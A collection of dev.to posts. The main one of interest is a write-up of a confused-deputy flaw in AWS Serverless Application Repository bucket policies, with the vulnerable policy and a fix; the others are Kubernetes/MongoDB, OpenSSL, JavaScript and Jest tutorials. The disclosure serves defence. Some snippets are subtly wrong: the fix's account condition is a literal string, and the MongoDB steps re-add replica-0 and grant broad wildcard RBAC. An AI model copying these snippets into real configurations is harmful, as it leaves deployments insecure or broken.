### Pros
- **encapsulation** - the whole logic and method calls required to perform the task are inside a single object with generic and simple interface. It allows queueing execution, reusing code, simple testing and refactorization.
- **dynamic behavior change** - passing command objects enables changing behavior of the `Invoker` in the runtime, i.e. when application config is updated remotely
- **multiple calls in one** - instead of calling multiple methods of a few `Receivers`, a single `Command` can be created that will do all that
- **undo/redo** - this pattern naturally allows to undo and redo set of instructions
- **simple extending** - adding new `Command` doesn't influence previous ones, or the calling `Invoker`
### Cons
- **many similar classes** - depending on the situation, using the `Command` pattern may cause having multiple classes with single line difference
- **premature complication** - using this pattern too early might end up with single `Command` class used in one place, but surrounded with additional interfaces, `CommandProcessor`, etc. | asvid |
808,837 | Is your AWS Account vulnerable to the newest attack presented at Black Hat 2021? | Running confused deputy attacks exploiting the AWS Serverless Application... | 0 | 2021-09-01T16:54:33 | https://codeshield.io/blog/2021/08/26/sar_confused_deputy/ | security, aws, cloud | #### Running confused deputy attacks exploiting the AWS Serverless Application Repository

Early this month at *Black Hat USA 2021*, researchers from *Wiz.io* [presented](https://www.blackhat.com/us-21/briefings/schedule/index.html#breaking-the-isolation-cross-account-aws-vulnerabilities-22945) a new [confused deputy attack](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) that allows an attacker to access data within your AWS account. Using to coarsely set IAM permissions when publishing an application within the AWS Serverless Application Repository (SAR), an attacker can acquire arbitrary data from the S3 bucket that is used for hosting the application's artifacts. In this article, we explain the vulnerability, showcase an actual exploit and explain how to fix the vulnerability in your account. If you are publishing an application using SAR, we recommend double-checking your permissions.
SAR is a platform that allows developers to publish and share [SAM](https://aws.amazon.com/serverless/sam/) applications across AWS accounts. These applications can then be deployed standalone or [easily be integrated into existing SAM applications](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-template-nested-applications.html).
Publishing an application to SAR is [straightforward](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-template-publishing-applications.html#serverless-sam-template-publishing-applications-prerequisites). As an author, one has to pack the underlying application code, templates, license, and readme files in a S3 bucket, create an entry in the SAR and attach a policy to the bucket that grants SAR access to the bucket.
The S3 policy allows SAR to read all objects stored in the specified S3 bucket. In their documentation, AWS initially proposed to attach the following IAM policy to the bucket:
```.json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "serverlessrepo.amazonaws.com"
},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::<your-bucket-name>/*",
}
]
}
```
What's the problem with this policy? It does not restrict the account on which's behalf SAR is allowed to access the bucket! While no account other than the owner of the SAR application can actually change the application's setup in SAR, every account can exploit SAR to query objects and data from an S3 bucket with such a `BucketPolicy`.
This allows attackers to extract sensitive data like source code, hardcoded credentials, or configuration files that were never meant to be accessible by others. Even worse, if the bucket is used for more than hosting the packed SAR application, which, by the way, is an antipattern itself, attackers can acquire this data too!
*****
### Exploiting the Vulnerability
To showcase the exploit, we prepared a SAR application setup of our [Serverless-Goat-Java](https://github.com/CodeShield-Security/Serverless-Goat-Java/tree/master/sar) implementation. Serverless-Goat was [originally developed](https://github.com/OWASP/Serverless-Goat) in JavaScript by OWASP and is an intentionally vulnerable serverless application. We [published](https://serverlessrepo.aws.amazon.com/applications/eu-central-1/028938425188/Serverless-Goat-Java) Serverless-Goat-Java into the AWS SAR for security training purposes.
With the following template, we deploy an AWS CloudFormation stack with the required bucket and policy to host a SAR app:
```.yaml
AWSTemplateFormatVersion: '2010-09-09'
Transform: AWS::Serverless-2016-10-31
Resources:
ServerlessGoatPackages:
Type: AWS::S3::Bucket
Properties:
BucketName: "serverless-goat-packages"
ServerlessGoatPackagesPolicy:
Type: 'AWS::S3::BucketPolicy'
Properties:
Bucket: !Ref ServerlessGoatPackages
PolicyDocument:
Version: 2012-10-17
Statement:
- Sid: ServerlessRepoAccess
Action:
- 's3:GetObject'
Effect: Allow
Resource: !Sub "arn:aws:s3:::${ServerlessGoatPackages}/*"
Principal:
Service: "serverlessrepo.amazonaws.com"
```
Afterward, we pack our Serverless-Goat-Java application, upload it into the newly created bucket, and create a new SAR application in the SAR.

As you can see, the application is bound to the account `028938425188` and can only be modified by it. Let's call the account hosting the vulnerable app `Alice`.
To test our exploit, we need another SAR application in a different account on which's behalf we can query objects from our ill-configured bucket. Let's call it account `Eve`. For the sake of ease, we just deployed Serverless-Goat-Java again, but to account `Eve`:

#### Let’s see how we can exploit it!
Now that our setup is complete, we can try to use SAR to query data from account `Alice`'s bucket and set it as a configuration for account `Eve`'s SAR app.
Therefore, we instruct SAR to set the Readme file of account `Eve`'s app to an arbitrary file from account `Alice`:

Looking again at the app in the SAR, SAR displays the following Readme in account `Eve`'s app:

Phew, we are evil! 😈 We just stole the authors license file! Let's try another one:

This time around, the acquired information is much more interesting:

Of course, this is only dummy information for the sake of this demonstration. 😊
As you saw, the exploit is very easy once you know about it. The application's ID is public, only the bucket and file names have to be guessed by an attacker. This might sound hard to do!? Well, as we all know, security by obscurity doesn't work too well, so let's strive for a proper fix!
*****
### Fixing the Vulnerability
The fix is even more straightforward than the exploit! We need to make sure that our bucket used for hosting the SAR app is only accessible by the account that actually publishes the app.
Therefore, we have to modify our `BucketPolicy` to contain a `condition` that checks the AWS account which tries to instruct SAR to access the bucket:
```.yaml
SampleBucketPolicy:
Type: 'AWS::S3::BucketPolicy'
Properties:
Bucket: !Ref ServerlessGoatPackages
PolicyDocument:
Version: 2012-10-17
Statement:
- Sid: ServerlessRepoAccess
Action:
- 's3:GetObject'
Effect: Allow
Resource: !Sub "arn:aws:s3:::${ServerlessGoatPackages}/*"
Principal:
Service: "serverlessrepo.amazonaws.com"
Condition:
StringEquals:
"aws:SourceAccount": "AWS::AccountId"
```
Indeed, AWS added the new condition expression right after the vulnerability was disclosed to them and [updated their documentation accordingly](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-template-publishing-applications.html#serverless-sam-template-publishing-applications-prerequisites). However, owners of the SAR applications need to update their S3 bucket policies, otherwise the respective AWS accounts remaining vulnerable.
After re-deploying our stack with the fixed policy, we observe the following when trying the exploit again:

Awesome! Now SAR can only modify account `Alice`'s app on the behalf of account `Alice`! 🛡
__Note: We changed the policy back after showcasing the fix, so you can try the exploit yourself easily with our [SAR application](https://serverlessrepo.aws.amazon.com/applications/eu-central-1/028938425188/Serverless-Goat-Java)!__
*****
### Fixing the vulnerability is one thing. But how to find it in the first place?
We develop _[CodeShield](https://codeshield.io)_ to help developers and security teams finding and
fixing vulnerabilities in cloud-native applications. _CodeShield_ can also help you to find Buckets that are vulnerable to the depicted confused deputy attack in your CloudFormation stacks and template files. Check it out and [try CodeShield yourself](https://dashboard.codeshield.io?utm_source=devto&utm_medium=bp&utm_campaign=confuseddep)!

__Stay tuned if you are using Terraform or haven't set up your SAR buckets via a CloudFormation stack.__ We are currently extending CodeShield to be able to scan whole AWS accounts independently of stacks or templates. If you want to get notified when whole account scanning is ready, <a href = "mailto:info@codeshield.io?subject=Whole Account Scanning Request&body=Please let me know when the whole account scanning feature is ready!">drop us a mail</a>!
*****
## About the Authors
**Manuel Benz** is co-founder of [CodeShield](https://codeshield.io?utm_source=devto&utm_medium=bp&utm_campaign=confuseddep), a novel context-aware cloud security tool focusing on in-depth program analysis of microservice architectures. Prior to the start-up, Manuel worked as a researcher on combinations of static and dynamic program analysis for vulnerability detection at the Secure Software Engineering group at Paderborn University. Manuel is still actively maintaining the [Soot static program analysis framework for Java](https://github.com/soot-oss/soot).
**Johannes Späth** is an AWS Community Builder and a co-founder of [CodeShield](https://codeshield.io?utm_source=devto&utm_medium=bp&utm_campaign=confuseddep). Johannes completed his Ph.D. in static program analysis. In his dissertation, he invented a [new algorithm for data-flow analysis](https://github.com/CodeShield-Security/SPDS) which allows automated detection of security vulnerabilities. | johspaeth |
819,770 | Installing MongoDB on Kubernetes with Replica Sets and NO MongoDB Operator | Are you tired of searching for MongoDB on Kubernetes and Immediately going to a MongoDB site on how... | 0 | 2021-09-10T12:17:04 | https://dev.to/ksummersill/installing-mongodb-on-kubernetes-with-replica-sets-and-no-mongodb-operator-4bom | mongodb, kubernetes, devops, operations | Are you tired of searching for MongoDB on Kubernetes and Immediately going to a MongoDB site on how to use their operator? Are you tired of finding nothing but Helm packages that you have no clue what is really going or finding a set of instructions that are made very complex? Are you tired of having no choice but to be pushed to a MongoDB cloud or Cloud Service Provider (AWZ, Azure, and GCP) service? I was tired of looking online just to find some complex way of setting up MongoDB. So let's cut out the complexity and move on to making MongoDB simple.
Shows the full stack deployed on ArgoCD within clusterStep 1.
## Setting up the Role-Based Access Controls (RBAC)
The first thing we need to do is set up a Service Account, a ClusterRole, and connect the two with a Cluster RoleBinding. This will be used for our "headless" service that MongoDB will utilize when creating DNS association of the replica sets.
Create a file called mongodb-rbac.yml and add the following:
```
apiVersion: v1
kind: ServiceAccount
metadata:
name: mongo-account
namespace: <your-namespace>
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: mongo-role
rules:
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["*"]
- apiGroups: [""]
resources: ["deployments"]
verbs: ["list", "watch"]
- apiGroups: [""]
resources: ["services"]
verbs: ["*"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["get","list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: mongo_role_binding
subjects:
- kind: ServiceAccount
name: mongo-account
namespace: <your-namespace>
roleRef:
kind: ClusterRole
name: mongo-role
apiGroup: rbac.authorization.k8s.io
```
The roles are pretty simple. They are set up to have access to watch and list the deployment and review the services of the pods.
Apply the RBAC by running:
```
kubectl apply -f mongodb-rbac.yml
```
## Step 2. Setting up the Headless Service
First of all, What in the world is a "headless" service! Well in Kubernetes by default if no Service Type is specified, then a ClusterIP is given. However, a headless service means that there will be NO ClusterIP given by default. So how do we do this? Well, it's simple. Just add "clusterIP: None" into your specification for the service. Let's do just this.
Create a file called mongodb-headless.yml and add the following:
```
apiVersion: v1
kind: Service
metadata:
name: mongo
namespace: <your-namespace>
labels:
name: mongo
spec:
ports:
- port: 27017
targetPort: 27017
clusterIP: None
selector:
app: mongo
```
Great! Now apply by using;
```
kubectl apply -f mongodb-headless.yml
```
## Step 3. Setting up the StatefulSet Deployment with Persistence
MongoDB really is Monolithic, but in order to set it up for Kubernetes, a StatefulSet deployment will be required. This is because we will NOT be using an Operator to handle the Statefulness but instead do it on our own. Now there will be Persistance set up as well. This will be done with a VolumeClaimTemplate.
Create a file called mongodb-stateful-deployment.yml and add the following:
```
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: mongodb-replica
namespace: <your-namespace>
spec:
serviceName: mongo
replicas: 2
selector:
matchLabels:
app: mongo
template:
metadata:
labels:
app: mongo
selector: mongo
spec:
terminationGracePeriodSeconds: 30
serviceAccount: mongo-account
containers:
- name: mongodb
image: docker.io/mongo:4.2
env:
command: ["/bin/sh"]
args: ["-c", "mongod --replSet=rs0 --bind_ip_all"]
resources:
limits:
cpu: 1
memory: 1500Mi
requests:
cpu: 1
memory: 1000Mi
ports:
- name: mongo-port
containerPort: 27017
volumeMounts:
- name: mongo-data
mountPath: /data/db
volumeClaimTemplates:
- metadata:
name: mongo-data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 20Gi
```
This should be pretty simple to understand. Basically, the Statefulset deployment is using the Service Account that was stood up in Step 1. Then the docker.io/mongo:4.2 image is utilized. The key to the replica set is the commands on runtime in the arg key field. This is what will be used to set up the replica set on runtime for each pod:
```
mongod --replSet=rs0 --bind_ip_all
```
Of course, the "/data/db" folder is persisted by assigning it to the VolumeClaimTemplate.
Great! Now apply the file by running:
```
kubectl apply -f mongodb-stateful-deployment.yml
```
## Step 4. Setting up Replication Host
Some manual configuration will need to be done in order to set up replication. However, the steps are very simple. In order to set up replication, you must first port-forward into Pod 0 that was created by the Statefulset. So let's port-forward by running:
kubectl exec -it mongodb-replica-0 -n <your-namespace> -- mongo
So this will exec an Individual terminal and run the command mongo to access inside of the MongoDB.
From here replication must be initialized. To do so run the following:
```
rs.initiate()
```
The expected output after running rs.initiate() is to see:
"no configuration specified. Using a default configuration for the set".
Now let's set up a variable called cfg. This variable will be used to execute rs.conf(). Run the following:
```
var cfg = rs.conf()
```
Now let's utilize the variable to add a Primary server to the ReplicaSet configuration.
```
cfg.members[0].host="mongodb-replica-0.mongo:27017"
```
So what in the world does this mean. So the "mongodb-replica-0" represents the Pod Name. The "mongo" represents the "headless service" that we stood up and the 27017 of course is the MongoDB port.
Now lets setup the configuration by running:
```
rs.reconfig(cfg)
```
Great! What we should now see is a response of:
"ok": 1
The ok of 1 represents that the configuration was successful.
##Step 5. Add the Second MongoDB Instance/Pod
Now the second instance/pod needs to be added to the replicaset configuration. To do that run the following:
```
rs.add("mongodb-replica-0.mongo:27017")
```
Again the output should show an OK status of 1.
##Step 6. Verify the ReplicaSet Status
This is a very easy command and should be used to reference the primary and secondary servers. Run the command:
```
rs.status()
```
This should now show the two servers added to the replica.
Updating Replicas (Optional)
Now lets say that you want to add another replica set. All you have to do is run:
```
kubectl scale sts <name of statefulset> -n <name of namespace> --replicas <number of replicas>
```
Now to add the replicas to the server just port-forward back into replica-0 pod by running:
```
kubectl exec -it mongodb-replica-0 -n <your-namespace> -- mongo
```
Then repeat what we did in Step 5 but for the new pod added because of the update in replica.
Of course, if you want to remove then just run rs.remove().
Awesome. I will be created an article very soon that will identify how to set up an External Connection within Kubernetes to connect to MongoDB using Compass. | ksummersill |
845,395 | Sorting an Array of JavaScript Objects in a Specific Order | Sorting an array of objects in javascript is simple enough using the default sort() function for all... | 0 | 2021-09-29T22:34:22 | https://dev.to/mick_patterson_/sorting-an-array-of-javascript-objects-in-a-specific-order-48am | javascript, webdev, tutorial | Sorting an array of objects in javascript is simple enough using the default sort() function for all arrays:
```javascript
const arr = [
{
name: "Nina"
},
{
name: "Andre"
},
{
name: "Graham"
}
];
const sortedArr = arr.sort((a,b) => {
if ( a.name < b.name ){
return -1;
}
if ( a.name > b.name ){
return 1;
}
return 0;
});
```
And it is trivial enough to swap the sort order by switching the returns or the if statements above.
But what if you need to sort an array of objects in a specific, non-alphabetical order?
An example I came across was to transfer some SQL data for importing to a database and the transfer needed to occur in a table-dependent way, so as to not break the table constraints of importing foreign keys that didn't exist yet.
```javascript
// Defined sort order starting with the 'lowest' table in the SQL schema
const importOrder = ["Photo", "Address", "State", "Country"];
const tables = [
{
name: "Address"
},
{
name: "State"
},
{
name: "Photo"
},
{
name: "Country"
}
];
const sortByObject = importOrder
.reduce((obj, item, index) => {
return {
...obj,
[item]: index,
};
}, {});
const customSort = tables.sort((a, b) => sortByObject[a.name] - sortByObject[b.name]);
```
So what's going on here?
The key is the importOrder.reduce() function. This is transforming the importOrder array into an object that creates a numerical order for each item in the original import array:
```javascript
// Output of sortByObjeect
{
Address: 1,
Country: 3,
Photo: 0,
State: 2,
}
```
This then makes sorting the array much simpler by being able to directly look up an integer value for the sort position, which is what we are passing into the sort function of the tables array:
```javascript
// Output of tables.sort()
[
{name: "Photo"},
{name: "Address"},
{name: "State"},
{name: "Country"}
]
```
Originally posted [here](https://www.mickpatterson.com.au/blog/sorting-an-array-of-javascript-objects-in-a-specific-order) | mick_patterson_ |
848,302 | Update OpenSSL to 3.0 on CentOS7 | Prerequisites Use sudo when needed. Install perl-IPC-Cmd and perl-Test-Simple: sudo... | 0 | 2021-10-01T20:02:50 | https://dev.to/nikolastojilj12/update-openssl-to-3-0-on-centos7-150o | openssl, centos7, libopenssl, devops | ## Prerequisites
Use `sudo` when needed.
Install `perl-IPC-Cmd` and `perl-Test-Simple`:
```bash
sudo yum install perl-IPC-Cmd perl-Test-Simple
```
## Download and install OpenSSL 3.0
Go to [OpenSSL's download page](https://www.openssl.org/source/) and copy the link to the latest version. At this time it's 3.0.0. Then run (adapt the command to reflect your version):
```bash
cd /usr/src
wget https://www.openssl.org/source/openssl-3.0.0.tar.gz
tar -zxf openssl-3.0.0.tar.gz
rm openssl-3.0.0.tar.gz
```
Compile, make, test and install OpenSSL:
``` bash
cd /usr/src/openssl-3.0.0
./config
make
make test
make install
```
Create symlinks to `libssl` and `libcrypto`:
```bash
ln -s /usr/local/lib64/libssl.so.3 /usr/lib64/libssl.so.3
ln -s /usr/local/lib64/libcrypto.so.3 /usr/lib64/libcrypto.so.3
```
Test the installed version with:
```bash
openssl version
```
You should get something like this:
```
OpenSSL 3.0.0 7 sep 2021 (Library: OpenSSL 3.0.0 7 sep 2021)
```
If you liked the article,...
[](https://www.buymeacoffee.com/puEW3HvWvP) | nikolastojilj12 |
882,449 | Know this easily test React app | Jest and Testing Library were the most powerful tool for testing React App. In this post, we are... | 0 | 2021-10-31T02:02:21 | https://www.thangphan.xyz/posts/know-this-easily-test-react-app/ | testing, react, javascript, webdev | ---
canonical_url: "https://www.thangphan.xyz/posts/know-this-easily-test-react-app/"
---
_Jest_ and _Testing Library_ were the most powerful tool for testing React App. In this post, we are going to discover the important concept of them.
Let's dig in!
This is the simplest test that we can write in the first time using _Jest_.
```javascript
test('1 plus 2 equal 3', () => {
expect(1 + 2).toBe(3)
})
```
### Test Asynchronous
Suppose that I have a fake API that returns the user response with `id: 1`, in the test case, I intentionally set change `id: 3` to check whether the test works properly or not, and I end up with a `passed` message.
The reason is that the test case is completed before the promise finishes.
```tsx
test('user is equal user in response', () => {
const user = {
userId: 1,
id: 3,
title: 'delectus aut autem',
completed: false,
}
fetch('https://jsonplaceholder.typicode.com/todos/1')
.then((response) => response.json())
.then((json) => expect(user).toEqual(json))
})
```
In order to avoid this bug, we need to have `return` in front of `fetch`.
```tsx
test('user is equal user in response', () => {
const user = {
userId: 1,
id: 3,
title: 'delectus aut autem',
completed: false,
}
return fetch('https://jsonplaceholder.typicode.com/todos/1')
.then((response) => response.json())
.then((json) => expect(user).toEqual(json))
})
```
The test case above can rewrite using `async, await`:
```tsx
test('user is equal user in response using async, await', async () => {
const user = {
userId: 1,
id: 2,
title: 'delectus aut autem',
completed: false,
}
const res = await fetch('https://jsonplaceholder.typicode.com/todos/1')
const resJson = await res.json()
expect(user).toEqual(resJson)
})
```
### Useful methods
`beforeAll`: To add some code that we want to run once before the test cases is run.
`afterAll`: To add some code that we want to run after all test cases are finished. e.g. clear the database.
`beforeEach`: To add some code that we want to run before each test case.
`afterEach`: To add some code that we want to run at the point that each test case finishes.
Suppose that I have three test cases, and I set:
```tsx
beforeEach(() => {
console.log('beforeEach is working...')
})
```
Three `console` will appear on my terminal. Conversely, Using `beforeAll` I only see one `console`.
The logic way is the same with `afterEach` and `afterAll`.
### The order run
We already have `describe`(combines many test cases), `test`(test case).
What is the order that jest run if test file was mixed by many `describe`, `test`?
You only need to remember this order: `describe` -> `test`.
To illustrate:
```tsx
describe('describe for demo', () => {
console.log('this is describe')
test('1 plus 2 equal 3', () => {
console.log('this is test case in describe')
expect(1 + 2).toBe(3)
})
describe('sub-describe for demo', () => {
console.log('this is sub-describe')
test('2 plus 2 equal 4', () => {
console.log('this is test case in sub-describe')
expect(2 + 2).toBe(4)
})
})
})
```
_Can you spot on the order in the example above?_
My terminal log:
- this is describe
- this is sub-describe
- this is test case in describe
- this is test case in sub-describe
### Mock function
I think the most powerful of Jest is having a mock function that we are able to mock the `params`, `object` which defined by the `new` keyword, and customize the return value.
This is an example:
```tsx
function plusTwoNumbers(
list: Array<number>,
callback: (a: number, b: number) => void,
) {
callback(list[0], list[1])
}
test('mock function callback', () => {
const mockFnc = jest.fn((a, b) => console.log('total:', a + b))
plusTwoNumbers([1, 2], mockFnc)
})
```
We mock `callback` function, get the `params` of it, and customize the result `console.log("total:", a + b)`.
We are also able to mock modules, e.g. I use `uuid` in order to generate a unique `id`.
When I move on to testing, instead of using `uuid`, I can mock the `uuid` module like the code below:
Normally, whenever I call `uuid.v4()` I will get a random value like this: `5442486-0878-440c-9db1-a7006c25a39f`
But I want my value to be `1234`, I can use the code below:
```tsx
import * as uuid from 'uuid'
jest.mock('uuid')
test('mock uuid module', () => {
uuid.v4.mockReturnValue('1234')
console.log('uuid.v4()', uuid.v4())
// 1234
})
```
Otherwise, I can use `mockImplementation` to customize.
```tsx
uuid.v4.mockImplementation(() => '1234')
```
_`mockImplementation` is the function that we customize the function that is created from other modules._
### Config Jest
I'm going to introduce to you about the most important configs in Jest.
Let's go!
- `collectCoverageFrom`
This config helps Jest knows exactly the place that needs to collect information, and check coverage. It is very useful, you can run:
Run `jest --coverage` in order to figure out the component, the function, we still need to write test, and discover the spots we still don't test yet.
- `moduleDirectories`
This config points to the `module` that we will use in the `test` file.
By default, it was configured `["node_modules"]`, and we are able to use the the module under `node_modules` folder in our test cases.
- `moduleNameMapper`
This config provides for us the ability to access the resources, based on the place that we have set.
```tsx
moduleNameMapper: {
"assets/(*)": [
"<rootDir>/images/$1"
]
}
```
See the example above, now we set the path `assets/(*)` that pointed to `<rootDir>/images/$1`.
If I set `assets/logo.png`, Jest will find `<rootDir>/images/logo.png`.
- `rootDir`
By default, it is the place that contains `jest.config.js`, `package.json`.
The place is where Jest will find to use `modules`, and run test cases.
It turns out I can set "rootDir: '**test**'" and run test cases without config `roots`, but I shouldn't do this.
- `roots`
This is the config that we set the place that test files belong to.
For example:
If I set:
```tsx
roots: ['pages/']
```
but I write test in `__test__` folder which is the same level with `pages/`. No test cases will be run with the config above. I need to change `pages/` -> `__test__`.
- `testMatch`
We use this config in order to communicate to Jest what files we want to test, otherwise, please skip!
- `testPathIgnorePatterns`
Please ignore files under a place, that is the reason this config exists.
- `transform`
Sometimes, in our test cases, we write some new code that `node` doesn't support at all, so we need to transform to the code that Jest can understand.
If my project use `typescript`, I need to set up transform in order to make `typescript` to `javascript` code that node can understand.
- `transformIgnorePatterns`
We might have some files, some folders we don't want to transform, so we use this config.
### How to write test
We need to write tests in order to be more confident about the code that we wrote. So when we think about the test cases, the core concept is we have to think about the use case, do not think about the code. It means we must focus
into what's the future that the code can support for users.
This is the main concept when we think about creating `test cases`.
e.g:
I have created a react-hook in order to support four features below:
1. returns the value in first data using first property, condition true.
2. returns the value in second data using second property, condition false.
3. returns the value in second data using first property, condition false.
4. returns the default value with second data undefined, condition false.
```tsx
import * as React from 'react'
type Props<F, S> = {
condition: boolean
data: [F, S]
}
function useInitialState<F, S>({condition, data}: Props<F, S>) {
const giveMeState = React.useCallback(
(
property: keyof F,
anotherProperty: S extends undefined ? undefined : keyof S | undefined,
defaultValue: Array<string> | string | number | undefined,
) => {
return condition
? data[0][property]
: data[1]?.[anotherProperty ?? (property as unknown as keyof S)] ??
defaultValue
},
[condition, data],
)
return {giveMeState}
}
export {useInitialState}
```
So I only need to write four test cases for the four features above:
```tsx
import {useInitialState} from '@/utils/hooks/initial-state'
import {renderHook} from '@testing-library/react-hooks'
describe('useInitialState', () => {
const mockFirstData = {
name: 'Thang',
age: '18',
}
test('returns the value in first data using first property, condition true', () => {
const mockSecondData = {
name: 'Phan',
age: 20,
}
const {result} = renderHook(() =>
useInitialState({
condition: Boolean(mockFirstData),
data: [mockFirstData, mockSecondData],
}),
)
const data = result.current.giveMeState('name', undefined, '')
expect(data).toBe(mockFirstData.name)
})
test('returns the value in second data using second property, condition false', () => {
const mockSecondData = {
firstName: 'Phan',
age: 20,
}
const {result} = renderHook(() =>
useInitialState({
condition: Boolean(false),
data: [mockFirstData, mockSecondData],
}),
)
const data = result.current.giveMeState('name', 'firstName', '')
expect(data).toBe(mockSecondData.firstName)
})
test('returns the value in second data using first property, condition false', () => {
const mockSecondData = {
name: 'Phan',
age: 20,
}
const {result} = renderHook(() =>
useInitialState({
condition: Boolean(false),
data: [mockFirstData, mockSecondData],
}),
)
const data = result.current.giveMeState('name', undefined, '')
expect(data).toBe(mockSecondData.name)
})
test('returns the default value with second data undefined, condition false', () => {
const mockDefaultValue = 21
const {result} = renderHook(() =>
useInitialState({
condition: Boolean(false),
data: [mockFirstData, undefined],
}),
)
const data = result.current.giveMeState('age', undefined, mockDefaultValue)
expect(data).toBe(mockDefaultValue)
})
})
```
### Testing Library
Let's take a slight review about the main things in _Testing Library_.
- **getBy..**: we find the DOM element, throw error if no element is found.
- **queryBy..**: we find the DOM element, return null if no element is found.
- **findBy..**: we find the DOM element, throw an error if no element is found,
the search process is a promise.
The list below is the priority we should use in order to write test nearer with the way that our app is used.
- _getByRole_
- _getByLabelText_
- _getByAltText_
- _getByDisplayValue_
For example:
I have a component that contains two components: `AutoAddress`, `Address`.I need to find the use case that I want to support in order to create test cases.
This is a test case: `by default, name value of inputs was set`.
1. render the components
2. create the mockResult value
3. add assertions
```tsx
test('by default, name of address input was set', async () => {
render(
<AutoAddress wasSubmitted={false}>
<Address wasSubmitted={false} />
</AutoAddress>,
)
const mockResult = {
namePrefectureSv: 'prefertureSv',
namePrefectureSvLabel: 'prefectureSvLabel',
nameCity: 'city',
}
expect(screen.getByLabelText('Prefecture Code')).toHaveAttribute(
'name',
mockResult.namePrefectureSv,
)
expect(screen.getByLabelText('Prefecture')).toHaveAttribute(
'name',
mockResult.namePrefectureSvLabel,
)
expect(screen.getByLabelText('City')).toHaveAttribute(
'name',
mockResult.nameCity,
)
})
```
And this is a test case: `returns one address through postCode`.
1. render the components
2. create the mockResult value
3. mock the request API
4. input the postCode
5. click the search button
6. add assertions
```tsx
test('returns one address through postCode', async () => {
const mockResult = [
{
id: '14109',
zipCode: '1880011',
prefectureCode: '13',
city: 'Tokyo',
},
]
server.use(
rest.get(
`${process.env.NEXT_PUBLIC_API_OFF_KINTO}/${API_ADDRESS}`,
(req, res, ctx) => {
return res(ctx.json(mockResult))
},
),
)
render(
<AutoAddress wasSubmitted={false}>
<Address wasSubmitted={false} />
</AutoAddress>,
)
// input the post code value
userEvent.type(screen.getByLabelText('first postCode'), '111')
userEvent.type(screen.getByLabelText('second postCode'), '1111')
// search the address
userEvent.click(screen.getByRole('button', {name: /search address/i}))
// wait for the search process finishes.
await waitForElementToBeRemoved(() =>
screen.getByRole('button', {name: /searching/i}),
)
const address = mockResult[0]
const {prefectureCode, city} = address
expect(screen.getByLabelText('Prefecture Code')).toHaveAttribute(
'value',
prefectureCode,
)
expect(screen.getByLabelText('Prefecture')).toHaveAttribute(
'value',
PREFECTURE_CODE[prefectureCode as keyof typeof PREFECTURE_CODE],
)
expect(screen.getByLabelText('City')).toHaveAttribute('value', city)
})
```
### Recap
We just learned the main concepts in Testing React App! Let's recap some key points.
- Testing asynchronous need to have `return` in front of `promise`.
- We are able to control testing using _Jest_ configs.
- Thinking test cases, we must forget about code, focus on the use case.
- The order of DOM methods in _Testing Library_. | thangphan37 |
895,577 | Fastest way get your first developer job | Do you know the shortest path between two points? ...its a straight line. When trying to get your... | 0 | 2021-11-11T19:07:44 | https://dev.to/scottstern06/fastest-way-get-your-first-eng-gig-92b | codenewbie, webdev, beginners, career | Do you know the shortest path between two points?
...its a straight line.
When trying to get your first job as a software developer theres a lot of stuff you dont know.
It might seem like a good idea to learn python, and ruby, and javascript, and java (because java kinda sounds like javascript)
Well...when money is tight and you need to get a job its crucial to reflect on your goal (getting a job) and how you can get there from your current situation.
I recommend focusing on basic frontend technologies using HTML, CSS, and Javascript to build a simple game.
Idk something simple like every time you click a die it rolls a new number 1-6.
Simple and fun.
Then deploy it.....
Thats valuable.
Whats not valuable is...going through ANOTHER tutorial on something youll never use in your career.
Anywhoooooo...
Its not about how hard you work its about how hard you work doing the RIGHT things.
***If you want more:***
- Come join our Facebook group to help you get your first job as a software engineer, career development, and so much more!
https://www.facebook.com/groups/310120400851953
- Here is a [link](https://engjobresources.carrd.co/) to top 10 interview resources
| scottstern06 |
898,150 | Sparkly skull ✨ | A post by Jayant Goel | 0 | 2021-11-14T20:28:57 | https://dev.to/jayantgoel001/sparkly-skull-2ldn | codepen | {% codepen https://codepen.io/Mamboleoo/pen/yLbxYdx %} | jayantgoel001 |
913,705 | You DON'T need these to be a web dev | "If you don't know all of these, don't call yourself a web developer", followed by some list of web... | 0 | 2021-12-01T00:18:43 | https://dev.to/nitzanhen/you-dont-need-these-to-be-a-web-dev-c3b | webdev, beginners, javascript, programming | *"If you don't know all of these, don't call yourself a web developer"*, followed by some list of web dev related terms. Have you encountered one of these posts before? I come across them every once in a while on social media.
These sorts of divisive claims bring about nothing but toxicity to our community, and only alienate the junior developers who are new to it. Especially for the profit of some traffic on Twitter or elsewhere, it's despicable.
They paint a completely wrong image of the web dev scene, too - being a web developer is much more about the perpetual process of self-improving, learning new tools & technologies and experimenting with methods to combine them in the best way, rather than knowing some constant list of terms (which are often occasionally useful at best). And, built on top of the open-source industry, the web dev industry is one of the most welcoming industries out there, to programmers of any caliber.
So, to be perfectly clear - **you don't need to know [closures](https://stackoverflow.com/questions/111102/how-do-javascript-closures-work), [the event loop](https://nodejs.org/en/docs/guides/event-loop-timers-and-nexttick/), [hoisting](https://www.digitalocean.com/community/tutorials/understanding-hoisting-in-javascript), etc. to be a web developer**. The same goes for non-niche concepts & technologies - you can be a good dev without knowing [Docker](https://docs.docker.com/get-started/overview/), [FP](https://www.infoworld.com/article/3613715/what-is-functional-programming-a-practical-guide.html)/[OOP](https://searchapparchitecture.techtarget.com/definition/object-oriented-programming-OOP) or [cloud computing](https://azure.microsoft.com/en-us/overview/what-is-cloud-computing/), for example. Knowledge is always good to have, so if you're not familiar with them you should aspire to learn them sometime, but you can also be a damn good developer without them.
I think my personal journey is a good indication to this point: I was met with web development close to three years ago, when I began my mandatory service; beforehand I knew some Java, from school and from coding as a hobby. The "tutoring" I received consisted of one half-baked, 30 minute lesson about the basics of HTML, and my "training period" consisted of watching some YouTube tutorials for close to two weeks, after which I was already being assigned tasks (that I was obviously not ready for).
